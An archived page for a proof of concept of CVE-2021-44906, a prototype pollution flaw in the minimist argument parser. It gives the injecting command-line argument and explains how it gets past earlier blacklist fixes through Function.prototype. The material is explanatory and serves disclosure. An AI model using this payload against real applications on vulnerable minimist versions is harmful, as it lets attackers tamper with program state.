Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44906 PoC — minimist 安全漏洞

Source
https://github.com/nevermoe/CVE-2021-44906
Associated Vulnerability
Title:minimist 安全漏洞 (CVE-2021-44906)
Description:minimist是一款命令行参数解析工具。 minimist <=1.2.5存在安全漏洞,该漏洞源于容易受到通过文件 index.js、函数 setKey()的原型污染。
Readme
# CVE-2021-44906

Originally from: https://github.com/Marynk/JavaScript-vulnerability-detection/blob/main/minimist%20PoC.zip

## Run
```
npm run hack
```
And you will see the any function's done property is changed to true.
The explanation of command line `node index.js --_.concat.constructor.prototype.done true`:
- `--` is the hypen mark normally used in command line arguments.
- `_` is the built in key in minimist: https://github.com/minimistjs/minimist/blob/v1.2.5/index.js#L37
- `.concat.constructor.prototype.done true` will `set _.concat.constructor.prototype.done` to `true`.
Because `_.concat.constructor` is a `Function` type, all `Function`'s prototype will be added by a property called `done`.

The reason why the prototype chain is this long is that in the previous fixes, the developer banned `__proto__`, `Arrary.prototype`, `Object.prototype`, `Number.prototype` and `String.prototype`. So we have to use `constructor` who has prototype property and which is not blacklisted.

Another example is:
```
npm run hack2
```

However, in the above two example, we can only tamper values but not functions' definition.

## Cause
In the fix for CVE-2020-7598 (1.2.2), and in 1.2.3 the developer already fixed some vulnerability by checking `__proto__`, `Arrary.prototype`, `Object.prototype`, `Number.prototype`, `String.prototype`,
but they forgot to check `Function.prototye`. This is why this exploit can only affect the property of `Function`.
For the fix of this CVE, the developer checked the `Function.prototype` as well as `constructor`: https://github.com/minimistjs/minimist/blob/v1.2.6/index.js#L73
File Snapshot

 [4.0K]  /data/pocs/6c84b468bab2ad352b1b5b5ab8075c474c936766
├── [ 666]  index.js
├── [4.0K]  node_modules
│   └── [4.0K]  minimist
│       ├── [4.0K]  example
│       │   └── [  69]  parse.js
│       ├── [7.9K]  index.js
│       ├── [1.0K]  LICENSE
│       ├── [ 883]  package.json
│       ├── [2.4K]  readme.markdown
│       └── [4.0K]  test
│           ├── [ 756]  all_bool.js
│           ├── [4.1K]  bool.js
│           ├── [ 980]  dash.js
│           ├── [ 778]  default_bool.js
│           ├── [ 588]  dotted.js
│           ├── [ 376]  kv_short.js
│           ├── [ 779]  long.js
│           ├── [ 909]  num.js
│           ├── [4.5K]  parse.js
│           ├── [ 238]  parse_modified.js
│           ├── [1.2K]  proto.js
│           ├── [1.6K]  short.js
│           ├── [ 328]  stop_early.js
│           ├── [2.5K]  unknown.js
│           └── [ 191]  whitespace.js
├── [ 484]  package.json
├── [ 828]  package-lock.json
└── [1.6K]  README.md

4 directories, 24 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.